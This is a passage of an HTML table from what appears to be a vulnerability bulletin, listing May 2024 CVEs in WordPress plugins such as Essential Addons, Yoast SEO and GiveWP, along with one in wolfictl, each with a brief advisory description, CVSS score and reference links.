<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4280&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4280" target="_blank">CVE-2024-4280</a><br><a href="https://plugins.trac.wordpress.org/changeset/3082887/white-label-cms" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/13a206ea-0890-4535-9da7-54a7a45f0452?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>villatheme--Orders Tracking for WooCommerce<br> </td>
<td>The The Orders Tracking for WooCommerce plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 1.2.10. This is due to the plugin allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. A partial patch was released in 1.2.10, and a complete patch was released in 1.2.11.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4039&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4039" target="_blank">CVE-2024-4039</a><br><a href="https://plugins.trac.wordpress.org/browser/woo-orders-tracking/trunk/includes/frontend/frontend.php#L55" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3083652%40woo-orders-tracking&amp;new=3083652%40woo-orders-tracking&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/991ab188-869c-4875-80f3-940000a1717b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>visualmodo--Borderless Widgets, Elements, Templates and Toolkit for Elementor &amp; Gutenberg<br> </td>
<td>The Borderless - Widgets, Elements, Templates and Toolkit for Elementor &amp; Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4666&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4666" target="_blank">CVE-2024-4666</a><br><a href="https://plugins.trac.wordpress.org/browser/borderless/trunk/modules/elementor/widgets/circular-progress-bar.php#L427" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/borderless/trunk/modules/elementor/widgets/progress-bar.php#L412" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/borderless/trunk/modules/elementor/widgets/semi-circular-progress-bar.php#L403" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/borderless/trunk/modules/elementor/widgets/team-member.php#L1101" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/borderless/trunk/modules/elementor/widgets/testimonial.php#L905" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085856/" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/borderless/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b6840637-9b0f-4f3d-bb73-9e4527a5f326?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>weForms--weForms<br> </td>
<td>Client-Side Enforcement of Server-Side Security vulnerability in weForms allows Removing Important Client Functionality.This issue affects weForms: from n/a through 1.6.20.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-32512&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-32512" target="_blank">CVE-2024-32512</a><br><a href="https://patchstack.com/database/vulnerability/weforms/wordpress-weforms-plugin-1-6-20-form-submission-restriction-bypass-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>webdevmattcrom--GiveWP Donation Plugin and Fundraising Platform<br> </td>
<td>The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'give_form' shortcode when used with a legacy form in all versions up to, and including, 3.10.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3714&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3714" target="_blank">CVE-2024-3714</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083390/give/tags/3.11.0/includes/class-give-donate-form.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/dd8f5cfa-3431-4617-b2cd-d5a8ce4530f4?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>webtechideas--WTI Like Post<br> </td>
<td>Authentication Bypass by Spoofing vulnerability in webtechideas WTI Like Post allows Functionality Bypass.This issue affects WTI Like Post: from n/a through 1.4.6.</td>
<td>2024-05-17</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-33917&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-33917" target="_blank">CVE-2024-33917</a><br><a href="https://patchstack.com/database/vulnerability/wti-like-post/wordpress-wti-like-post-plugin-1-4-6-ip-restriction-bypass-vulnerability-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>wolfi-dev--wolfictl<br> </td>
<td>wolfictl is a command line tool for working with Wolfi. A git authentication issue in versions prior to 0.16.10 allows a local user's GitHub token to be sent to remote servers other than `github.com`. Most git-dependent functionality in wolfictl relies on its own `git` package, which contains centralized logic for implementing interactions with git repositories. Some of this functionality requires authentication in order to access private repositories. A central function `GetGitAuth` looks for a GitHub token in the environment variable `GITHUB_TOKEN` and returns it as an HTTP basic auth object to be used with the `github.com/go-git/go-git/v5` library. Most callers (direct or indirect) of `GetGitAuth` use the token to authenticate to github.com only; however, in some cases callers were passing this authentication without checking that the remote git repository was hosted on github.com. This behavior has existed in one form or another since commit 0d06e1578300327c212dda26a5ab31d09352b9d0 - committed January 25, 2023. This impacts anyone who ran the `wolfictl check update` commands with a Melange configuration that included a `git-checkout` directive step that referenced a git repository not hosted on github.com. This also impacts anyone who ran `wolfictl update &lt;url&gt;` with a remote URL outside of github.com. Additionally, these subcommands must have run with the `GITHUB_TOKEN` environment variable set to a valid GitHub token. Users should upgrade to version 0.16.10 to receive a patch.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-35183&amp;vector=CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N" target="_blank" title="CVSS V3 Score">4.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-35183" target="_blank">CVE-2024-35183</a><br><a href="https://github.com/wolfi-dev/wolfictl/blob/488b53823350caa706de3f01ec0eded9350c7da7/pkg/update/update.go#L143" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/wolfi-dev/wolfictl/blob/4dd6c95abb4bc0f9306350a8601057bd7a92bded/pkg/update/deps/cleanup.go#L49" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/wolfi-dev/wolfictl/blob/6d99909f7b1aa23f732d84dad054b02a61f530e6/pkg/git/git.go#L22" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/wolfi-dev/wolfictl/commit/0d06e1578300327c212dda26a5ab31d09352b9d0" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/wolfi-dev/wolfictl/commit/403e93569f46766b4e26e06cf9cd0cae5ee0c2a2" target="_blank">security-advisories@github.com</a><br><a href="https://github.com/wolfi-dev/wolfictl/security/advisories/GHSA-8fg7-hp93-qhvr" target="_blank">security-advisories@github.com</a></td>
</tr>
<tr>
<td>wpdevteam--EmbedPress Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps &amp; Embed Any Documents in Gutenberg &amp; Elementor<br> </td>
<td>The EmbedPress - Embed PDF, Google Docs, Vimeo, Wistia, Embed YouTube Videos, Audios, Maps &amp; Embed Any Documents in Gutenberg &amp; Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 3.9.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4316&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4316" target="_blank">CVE-2024-4316</a><br><a href="https://plugins.trac.wordpress.org/browser/embedpress/trunk/EmbedPress/Elementor/Widgets/Embedpress_Elementor.php#L3076" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2af03168-9344-4db0-9b69-2ad1fdb6d472?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpdevteam--Essential Addons for Elementor Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders<br> </td>
<td>The Essential Addons for Elementor - Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Interactive Circle widget in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4275&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4275" target="_blank">CVE-2024-4275</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083162/essential-addons-for-elementor-lite/tags/5.9.20/includes/Elements/Interactive_Circle.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/91f50b65-f001-4c73-bfe3-1aed3fc10d26?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpdevteam--Essential Addons for Elementor Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders<br> </td>
<td>The Essential Addons for Elementor - Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Dual Color Header', 'Event Calendar', &amp; 'Advanced Data Table' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4448&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4448" target="_blank">CVE-2024-4448</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083162/essential-addons-for-elementor-lite/tags/5.9.20/includes/Elements/Advanced_Data_Table.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083162/essential-addons-for-elementor-lite/tags/5.9.20/includes/Elements/Dual_Color_Header.php" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3083162/essential-addons-for-elementor-lite/tags/5.9.20/includes/Elements/Event_Calendar.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21e12c72-7898-4896-9852-ebb10e5f9a3b?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpdevteam--Essential Addons for Elementor Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders<br> </td>
<td>The Essential Addons for Elementor - Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'Fancy Text', 'Filter Gallery', 'Sticky Video', 'Content Ticker', 'Woo Product Gallery', &amp; 'Twitter Feed' widgets in all versions up to, and including, 5.9.19 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4449&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4449" target="_blank">CVE-2024-4449</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;old=3083162%40essential-addons-for-elementor-lite&amp;new=3083162%40essential-addons-for-elementor-lite&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/57ed6c7e-ca8d-476d-adce-905b2cd2eda8?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpdevteam--Essential Addons for Elementor Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders<br> </td>
<td>The Essential Addons for Elementor - Best Elementor Templates, Widgets, Kits &amp; WooCommerce Builders plugins for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eael_ext_toc_title_tag' parameter in versions up to, and including, 5.9.20 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4624&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4624" target="_blank">CVE-2024-4624</a><br><a href="https://plugins.trac.wordpress.org/browser/essential-addons-for-elementor-lite/tags/5.9.19/includes/Traits/Elements.php#L550" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085420/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/bedad627-0ccb-41c1-be8d-753f57be618f?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpdevteam--Essential Blocks Page Builder Gutenberg Blocks, Patterns &amp; Templates<br> </td>
<td>The Essential Blocks - Page Builder Gutenberg Blocks, Patterns &amp; Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tagName' parameter in versions up to, and including, 4.5.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-18</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4891&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4891" target="_blank">CVE-2024-4891</a><br><a href="https://plugins.trac.wordpress.org/browser/essential-blocks/trunk/blocks/AdvancedHeading.php#L115" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3087677/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e1bcebb3-920b-40cc-aa5c-24a1f729b28d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpexpertsio--Password Protected Ultimate Plugin to Password Protect Your WordPress Content with Ease<br> </td>
<td>The Password Protected - Ultimate Plugin to Password Protect Your WordPress Content with Ease plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.6.6 via the API. This makes it possible for authenticated attackers, with subscriber access or higher, to extract post titles and content, thus bypassing the plugin's password protection.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0437&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0437" target="_blank">CVE-2024-0437</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3034934%40password-protected%2Ftrunk&amp;old=3005632%40password-protected%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f3045ebf-70af-4124-9116-42c07f64a3bf?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpjoli--Joli FAQ SEO WordPress FAQ Plugin<br> </td>
<td>The Joli FAQ SEO - WordPress FAQ Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.2. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4082&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">4.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4082" target="_blank">CVE-2024-4082</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3081648%40joli-faq-seo%2Ftrunk&amp;old=3076380%40joli-faq-seo%2Ftrunk&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c45b6163-7ebf-4f18-afd6-735d02d9170d?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpkube--Simple Basic Contact Form<br> </td>
<td>The Simple Basic Contact Form plugin for WordPress for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 20240502. This allows unauthenticated attackers to execute arbitrary shortcodes. The severity and exploitability depends on the functionality of other plugins installed in the environment.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4144&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4144" target="_blank">CVE-2024-4144</a><br><a href="https://plugins.trac.wordpress.org/browser/simple-basic-contact-form/trunk/simple-basic-contact-form.php#L543" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3085036/" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ded1944f-662d-4d25-8277-4b1dc63b2144?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpkube--Simple Basic Contact Form<br> </td>
<td>The Simple Basic Contact Form plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'scf_email' parameter in versions up to, and including, 20221201 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4150&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4150" target="_blank">CVE-2024-4150</a><br><a href="https://plugins.trac.wordpress.org/browser/simple-basic-contact-form/trunk/simple-basic-contact-form.php#L122" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3080540" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/22074d7a-5dbd-4a0c-bc5d-e4c983e5edb4?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wproyal--Royal Elementor Addons and Templates<br> </td>
<td>The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Form Builder widget in all versions up to, and including, 1.3.974 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-16</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-3887&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">5.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-3887" target="_blank">CVE-2024-3887</a><br><a href="https://plugins.trac.wordpress.org/changeset?sfp_email=&amp;sfph_mail=&amp;reponame=&amp;new=3086890%40royal-elementor-addons&amp;old=3081886%40royal-elementor-addons&amp;sfp_email=&amp;sfph_mail=" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5122800d-f274-4129-84d4-02380269502c?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>wpsurface--BlogLentor<br> </td>
<td>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpsurface BlogLentor allows Stored XSS.This issue affects BlogLentor: from n/a through 1.0.8.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-34421&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" target="_blank" title="CVSS V3 Score">6.5</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-34421" target="_blank">CVE-2024-34421</a><br><a href="https://patchstack.com/database/vulnerability/bloglentor-for-elementor/wordpress-bloglentor-blog-designer-pack-for-elementor-plugin-1-0-8-cross-site-scripting-xss-vulnerability?_s_id=cve" target="_blank">audit@patchstack.com</a></td>
</tr>
<tr>
<td>wpzoom--WPZOOM Addons for Elementor (Templates, Widgets)<br> </td>
<td>The WPZOOM Addons for Elementor (Templates, Widgets) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widget Image Box in all versions up to, and including, 1.1.36 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-15</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4370&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4370" target="_blank">CVE-2024-4370</a><br><a href="https://plugins.trac.wordpress.org/browser/wpzoom-elementor-addons/trunk/includes/widgets/image-box/image-box.php#L1229" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084540" target="_blank">security@wordfence.com</a><br><a href="https://wordpress.org/plugins/wpzoom-elementor-addons/#developers" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c7aaff3e-0c81-4fe7-b162-569c517f6c49?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>xpro--140+ Widgets | Best Addons For Elementor FREE<br> </td>
<td>The 140+ Widgets | Best Addons For Elementor - FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's widgets in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4440&amp;vector=CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.4</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4440" target="_blank">CVE-2024-4440</a><br><a href="https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk/widgets/contact-form/contact-form.php#L1438" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk/widgets/course-grid/course-grid.php#L1918" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk/widgets/custom-field/custom-field.php#L1150" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk/widgets/post-grid/post-grid.php#L1829" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/xpro-elementor-addons/trunk/widgets/woo-product-grid/woo-product-grid.php#L3812" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5596197e-149d-4072-9fa4-424c9ffd6059?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>yithemes--YITH WooCommerce Gift Cards<br> </td>
<td>The YITH WooCommerce Gift Cards plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_mail_status' and 'save_email_settings' functions in all versions up to, and including, 4.12.0. This makes it possible for unauthenticated attackers to modify WooCommerce settings.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-0870&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" target="_blank" title="CVSS V3 Score">5.3</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-0870" target="_blank">CVE-2024-0870</a><br><a href="https://plugins.trac.wordpress.org/changeset/3084519/yith-woocommerce-gift-cards/trunk/includes/admin/class-ywgc-admin.php" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca1f0dc6-c0bc-4e9f-b3b6-d6274aa7a7db?source=cve" target="_blank">security@wordfence.com</a></td>
</tr>
<tr>
<td>yoast--Yoast SEO<br> </td>
<td>The Yoast SEO plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via URLs in all versions up to, and including, 22.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.</td>
<td>2024-05-14</td>
<td><a href="https://nvd.nist.gov/cvss.cfm?version=2&amp;name=CVE-2024-4041&amp;vector=CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" target="_blank" title="CVSS V3 Score">6.1</a></td>
<td><a href="https://nvd.nist.gov/nvd.cfm?cvename=CVE-2024-4041" target="_blank">CVE-2024-4041</a><br><a href="https://plugins.trac.wordpress.org/browser/wordpress-seo/trunk/inc/class-wpseo-admin-bar-menu.php#L601" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/wordpress-seo/trunk/inc/class-wpseo-shortlinker.php#L20" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/wordpress-seo/trunk/src/helpers/short-link-helper.php#L105" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/browser/wordpress-seo/trunk/src/helpers/short-link-helper.php#L45" target="_blank">security@wordfence.com</a><br><a href="https://plugins.trac.wordpress.org/changeset/3078555/wordpress-seo/trunk#file129" target="_blank">security@wordfence.com</a><br><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4e04b161-3cd0-454d-869c-56f42bd8afb0?source=cve" 